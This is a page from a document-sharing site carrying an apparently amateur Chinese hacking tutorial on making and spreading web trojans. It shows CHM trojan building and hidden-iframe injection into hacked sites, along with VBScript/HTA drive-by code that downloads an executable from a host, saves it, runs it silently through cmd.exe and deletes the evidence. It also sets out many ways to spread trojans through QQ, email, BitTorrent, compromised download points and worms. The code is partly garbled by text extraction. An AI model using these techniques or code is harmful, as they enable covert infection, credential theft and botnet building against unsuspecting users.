收藏 分享(赏)

Hack速成(一).doc

上传人:kpmy5893 文档编号:8248199 上传时间:2019-06-16 格式:DOC 页数:13 大小:78.50KB
下载 相关 举报
Hack速成(一).doc_第1页
第1页 / 共13页
Hack速成(一).doc_第2页
第2页 / 共13页
Hack速成(一).doc_第3页
第3页 / 共13页
Hack速成(一).doc_第4页
第4页 / 共13页
Hack速成(一).doc_第5页
第5页 / 共13页
点击查看更多>>
资源描述

1、黑客速成学习法 加资料 网页木马制作与传播.网页木马制作与传播(一个星期)http:/ 01%=title%imgabout:blank/img%=count%票 %=percent%其实做网页木马的方法还是很多滴网上也有相关教程。最简单的也就是用 ChmBuilder这个软件来制作 chm木马了,首先我们要配置好一个木马服务端,我再这里就拿 QQ杀手 7.1版说下把。关于他的使用和配置我就不多说了把,下载了这软件都自带有帮助文件的,看几遍就会明白的了。然后生成服务端,假设我生成的木马服务端为 mm.exe,接着打开 ChmBuilder选择我们的 mm.exe然后点生成,就会在相同目录下自动

2、生成一个 mm.chm和 mm.htm (注意:这几个文件可不要轻易去点哦,万一出了什么后果,不要找偶_) 接着就把 mm.chm和 mm.htm传到自己的空间,如果没空间有肉鸡也是可以滴,建议最好用肉鸡,这样万一对方发现了也是你发现你肉鸡。但是有的空间还是比较严格的,在上传时会发现那个 mm.htm并不存在,那就是被对方的杀毒软件查杀了把。 到了这里我们就需要另外一个软件了 htmtool网页加密程序,选择源文件为 mm.htm目标文件 m.htm然后点加密,程序就会在mm.htm目录下生成一个用 javascript加密后的 m.htm,然后把 m.htm传肉鸡或空间里去把。 我在本机测试

3、。_blankhttp:/127.0.0.1/m.htm 就是我们的网页木马地址了,只要把这个发给别人,对方浏览了就会中了我们的木马。 但是对方会相信你吗?现在的网民安全意识也稍微提高了点,对于你发来的站都不会轻易去点。 所以呢还是自己动手把。入侵挂马!嘿嘿对不起那些站长了。 相信大家也都知道这个名词把.不知道的就别找我哦。一般在你入侵了一个站拿到了 webshell的时候,有的人也就是改下主页来满足自己的虚荣心把。下面来说挂马把。最常见的 挂站代码如下 :把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blankhttp:/127.0.0.1/m.htm。而_blank

4、http:/127.0.0.1/m.htm 也就是我门的网页木马了,那 width=“0“ height=“0“又是什么意思呢?懂点英文的朋友也应该知道了把,width 就是宽而 height自然就是高了。我们把它设置为 0也就是不显示了,对方也就看不见我们的这个页面,木马也就会被下载到本地。不过感觉这个方法已经过失了,现在的站长在发现自己的站被挂了木马后,如果主页代码过多,只要搜索 iframe就能找到了我们的木马了,一个 del,哈哈玩完了。所以,下面再介绍几个把。单独利用 chm这个文件来达到盗号目的。假设我们的木马服务端还是为 mm.exe然后在他相同目录下建一个 mm.htm文件,代

5、码如下当然你也可以把 mm.exe和 mm.htm换成是别的文件名。然后用 QuickCHM这个软件来编译成为 chm文件。(这些工具在 google都能搜索到的)然后 chm向导。选中*.*,项目文件夹就是刚才那两个 mm.exe和 mm.htm所在的目录了。然后下一步,htm 文件在上,exe 文件在下,接着可以编译他了。编辑成功后千万不要点“是”给运行了。那样自己就中了马了然后就会发现原来的 2个文件已经多出了四个newproject.chm,newproject.hhc ,newproject.hhk ,newproject.hhp 其实最后三个是没用的,删了他把只留一个 newpro

6、ject.chm ,然后把他改任意名上传空间。但这个挂马就不能用上面的那段代码了。假设我做好的 chm木马为_blankhttp:/127.0.0.1/mm.chm那就用以下代码http:/127.0.0.1/mm.chm:/test.htm“ type=“text/x-scriptlet“【学网教程】以前写了一篇文章,讲了关于怎样用最简单的方法获取对方的管理权限,里面用到了网页木马,最近有许多网友问我怎样制作网页木马,就这个问题我发表篇比较简单易懂的文章,希望大家珍惜我的劳动成果。我们经常听到这样的忠告:“不要随意下在不明的程序,不要随意打开邮件的附件.”这样的忠告确实是有用的,不过我们的系

7、统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过 IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子,也就是网页木马.首先我们需要编写几个简单的文件一。名字为 abc.abc的文件htmlscript. language=“vbscript“Function HttpDoGet(url)set Req = CreateObject(“Microsoft.XMLHTTP“)oReq.open “GET“,url,falseoReq.sendIf oReq.statu

8、s=200 thenHttpDoGet=oReq.respomseBodySavefile HttpDoGet,“c:win.exe“End IfSet Req=nothingEnd Functionsub SaveFile(str.fName)Set bjStream = CreateObject(“ADODB.Stream“)objStream.Type =1objStream.OpenobjStream.write strobjStream.SaveToFile fName.2objStream.Close()set bjStream = nothingexewin()End subSu

9、b exewin()set wshshell=createobject (“wscript.shell“ )a=wshshell.run (“cmd.exe /c c:win.exe“,0)b=wshshell.run (“cmd.exe /c del c:win.hta“,0)window.closeEnd SubHttpDoGet “http:/127.0.0.1/test.exe“/script/html二。名字为 test.htm的文件htmlbody木马运行测试!(这句话可以改成你想说的)object date=“http:/127.0.0.1/win.test“;/object/b

10、ody/html三。名字为 win.test的文件htmlbodyscript. language=“vbscript“Function HttpDoGet(url)set Req = CreateObject(“Microsoft.XMLHTTP“)oReq.open “GET“,url,falseoReq.sendIf oReq.status=200 thenHttpDoGet,“c:win.hta“Set Req=nothingEnd ifend functionsub SaveFile(str,fName)Dim fso, tfS e t f s o = C r e a t e O b

11、 j e c t(Scripting.FileSystemObject“)Set tf = fso.CreateTextfile(fName,True)tf.Write strtf.Closeexewin()End subSub exewin()set wshshell=createobject (“wscript.shell“ )a=wshshell.run (“cmd.exe /c c:win.hat“,0)window.closeEnd SubHttpDoGet(“http:/127.0.0.1/abc.abc“)/script/body/html四。名字为 test.exe的木马程序。

12、晕.这个就不用我提供了吧,你想用什么木马就把他的名字换成 test.exe传上去就可以了。服务器的文件列表test.htm:对外发布的网页win.test:下在文件 abc.abc到对方机器上,并且保存为 win.hta并且执行。abc.abc下载二进制的木马文件 test.exe,并执行test.exe:木马程序。上面所说的文件可以修改成任意名字,只是不要忘记把源码里的文件指向也修改就可以了!最后是设置 IIS,打开“程序管理工具internet 服务管理器”,右键单击要设置的站点,选择属性,在选择“http 头”。单击“MIME 映射”里的“文件类型”按钮,并在关联扩展名文本框中输入“.h

13、ta”,在内容类型(MIME)中输入“application/hta“,然后关闭所有窗口就可以了。有许多朋友多遇见过,说什么赠送 Q号或者玩网游的时候里面有人喊赠送好东东在 XXX网址,其实那上面所说的例子用的就是这种原理,不知不觉中你机器上的所有有关于密码或者指定名词的东西全发送到对方指定的邮件箱里去了看完后是否觉得这种木马太危险,甚至有种想把网线拔掉的感觉那?呵呵,其实了解了网页木马的工作原理后我们就不难防护他,看完以上内容后就可以得出一个结论,网页木马主要利用 IE的漏洞来实现的,所以在预防的时候一定要做到以下几点就可以保证上网的安全了,A。安装 IE的最新版本并且随时下在才做系统和 I

14、E的补丁程序。B。不随便登陆不熟悉朋友送来的网站,对于熟悉的朋友也要小心哦。C。不随便登陆黑客网站(_黑基除外了啦,我担保的.),色情网站,尤其一些卖外挂,卖木马的网站。D。不随便打开和预览有附件的邮件。E。安装防火墙和杀毒软件的最新版本,经常进行升级和查毒传播本文章总节归纳了目前最流行的木马传播技术以及以后木马传播技术的发展趋势,内容相当丰富.相信看完本教程你一定会成为养鸡专业户.一.目前流行木马传播技术.1.用 BT制作木马种子利用 BT制作木马种子的教程网上也发布了很多,这里主要找一款具有诱惑性的软件然后捆绑上自己的木马,做成种子,最后发布出去.相信利用 BT抓鸡速度可是超快哦.2.利用

15、 PP共享自己捆了木马的软件或电影.方法同 BT一样,要找诱惑性电影或软件,捆上自己的木马,然后共享自己的目录,这样人家就会通过搜索找到你的软件或电影.这里电影要配合网页木马.可以参看RealOnePlaye木马制作.在黑鹰可以找到.当你一打开我们的电影时就会打开我们制作过的网页木马.这样看电影也会中我们的马.3.利用 QQ邮箱传播木马.这里主要点 HTML格式-在里面写上以下这段代码:当人家一打开你发过去的邮件时,就会中我们的木马.4.QQ群发网页木马。首先,你要申请多个 QQ号,然后找款 QQ消息群发器(黑鹰网站可以找到大量相关 QQ群发信息软件,)再然后要加上非常具有诱惑性的消息(肉鸡的

16、多与少与这个直接相关,),骗取人家点你的网址。最后,在晚上时可以挂在电脑上群发带有网页木马的信息。相信只要你的信息够诱惑,肉鸡也是成群的。5.利用 163邮箱传播网页木马。同样,这里用 HTML格式,然后填上以下代码:对方只要一打开,就会中我们的网页木马。这里发送邮件时注意一些技巧,我们要加入一些社会工程会。比如对方是爱好车的,你就在邮件标题上写上关于车的诱惑性标题。目的只有一个,让他点我们带有网页木马的邮件。6.利用邮箱群发我们的网页木马。这里要用到论坛邮箱提取器,这类工具黑鹰也有下载,大家可以找一下。提取大量邮箱后,配合 FOXMAIL这款软件进行群发传播带有网页木马的邮件。这里也要注意技

17、巧,比如在一个游戏论坛提取的邮箱,你就可以伪装本论坛发给广大游戏玩家,提供最新游戏外挂下载.然后写上自己的网页木马.大部分都认为信息的真实性而点击.从而中我们的木马. 这里还可以配合利用 HTML格式群发我们的网页木马效果可更佳!7.捆绑欺骗这也是比较常用的传播木马技术.把木马捆在游戏,流行软件上,配合以上方法,QQ,邮箱,BT,论坛,等发布捆了木马的软件.骗取点我们的软件,这样也就同时中了我们的木马.关于捆绑技术,本人做了三个非常具体详细的语音动画教程.不懂的可以在黑鹰查找本人的捆绑系列专辑教程.8.攻破下载点,捆上木马放入下载点.当我们入侵到一些网站时,看看是否开放 21服务,也就是是否提

18、供 FTP服务.若入侵到这类网站,恭喜你,你又可以得到大批量肉鸡.你可以捆上自己的木马然后放入下载点等待人家上钩吧!该方法抓鸡的速度也非常快.9.钓鱼式欺骗别人点击你的网页木马地址或木马.钓鱼式欺骗攻击,也是国内最新发现的一种攻击手法.主要利用社会工程会中的信任关系骗他点击.具体的利用方法:当盗了人家的 QQ号,你可以看看有几个群,然后在群里放上自己捆绑的木马.接着在群里发几条诱惑性的信息,比如最新申请 6位 QQ号软件,由于是在同一个群,可能他们对该 QQ号主人有一定的信任度,所以点击的可能性一定很大.若该 QQ号主人是群主或是管理员,哈哈,我们来个更毒的,干脆在公告上写上自己的网页木马地址

19、,然后说本群刚建的专用网站!由于是群主,他们对他的信任度可想而知.应该都会点的吧!还有一招,在他 QQ的个人资料上或个人签名上填上自己的网页木马,然后说刚建的个人网站.相信很多好友都会自动点击吧!10.网站主页挂马这个应该不用具体介绍吧,教程有 N多.入侵到一个网站得到 WEBSHELL后,接下来大家是不是都忙着找首页挂马了.11.论坛漏洞挂马这里主要利用论坛的一些漏洞进行挂马,比如最近的动网前台提升管理员,然后挂马,动网的个人资料过虑不严挂马,还有投票挂马等等.利用这些漏洞进行挂马.也有相关教程,不是很清楚的可以在黑鹰找到.12.文件类型伪装这里主要把一些木马服务端和一些文本文件捆绑在一起,

20、然后通后自解压方式或捆绑器制作成文本文件类型的可执行文件.但他以为打开一个文本文件时,虽然能正常运行文本文件,其实已经中了我们的木马.真是神不知鬼不觉!本人也做过文件类型欺骗的动画教程.不是很清楚的也可以在黑鹰或动画吧找到本人的相关的教程.当然,还要以伪装成其它的类型,比如把木马制作成 BMP图片.BAT 格式等.只要他一运行就会中我们的马.14.其它的传播技术:比如制作图片木马,也有专门的图片木马制作工具,RM 木马制作黑鹰也有相关教程,RealOnePlayer 木马制作,FLASH 木马制作.也有专门的制作工具,网上可以找到相关工具.这些也是比较常用的传播技术.只要你有这方面的思路,都可

21、以在网上找到相关资料,自己尝试制作.二.新型高级木马传播技术下面介绍几种比较高级的木马传播技术.由于有一定的技术难度,所以隐蔽性比较强,传播速度也快,而且也几乎不会被杀毒软件查杀.1.在 WORD文档中加入木马文件这种方法非常隐蔽,在 WORD文档尾加入木马文件,只要别人点击这个所谓的WORD文件就会中木马,这种方法主要是通过把一个 EXE格式的木马文件接在一个 DOC文件的末尾,使别人察觉不到木马的存在,因此使之上当受骗.具体实现方法,比较复杂.本人也在进一步的研究之中.相信在不久这种方法就会流行起来.现在主要被一些高手使用.2.黑客工具绑木马其实这本来算不上高级的方法,但最近发现很多黑客软

22、件发布站,捆了木马的工具躲过管理员的检测.照样发布出来,想像危害性有多大.其实他们就是利用人性的弱点.黑客工具本来被杀毒软件查杀,捆了木马的工具被查杀就不觉得奇怪了.就会放松警惕.从而被他们利用.这一招是他们把黑客中的社会工程学利用的“恰到好处“!3.用 Z-file伪装加密木马程序z-file伪装加密软件是台湾华顺科技产品,其经过将文件压缩加密之后,再以bmp图像文件格式显示出来,扩展名是 bmp,执行后是幅普通的图像.黑客会将木马程序和小游戏合拼,再用 z-file加密及将此“混合体“发给受害者,由于看上去是图像文件,受害者往往不以为然,打开后又只是一般的图片,最可怕的地方还在于就连杀毒软

23、件也检测不出它内藏木马.4.伪装成应用程序扩展组件此类属于最难识别的特洛伊木马,也是骗术最高的木马,当然技术实现也有相当的难度由于涉及到编程,所以我这里只简单介绍原理,以供参考.采用内核插入式的嵌入方式,利用远程插入线程技术,嵌入 DLL线程,或者挂接PSAPI,实现木马程序的隐藏.5.通过 QQ病毒,QQ 蠕虫,QQ 尾巴或邮箱病毒,蠕虫进行传播.相信利用这些技术进行传播木马的速度是最快的.这里要下载病毒,蠕虫源代码.进行分析.修改.加入我们的网页木马地址.然后传播到网上,这样就会一传十,十传百,指数级上升,自动为我们传播木马.这种传播速度是惊人的.网上也可找到相关 QQ蠕虫制作器,菜鸟朋友就可以直接制作自己的带有网页木马的蠕虫了.最近的唐山黑客就是利用QQ尾巴传播自己的木马,感染并操控了四万多台民用电脑.进行对北京的一家音乐网站进行分布式 DDOS攻击.利用该技术是相当高级的,速度也是最快的.

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 企业管理 > 管理学资料

本站链接:文库   一言   我酷   合作


客服QQ:2549714901微博号:道客多多官方知乎号:道客多多

经营许可证编号: 粤ICP备2021046453号世界地图

道客多多©版权所有2020-2025营业执照举报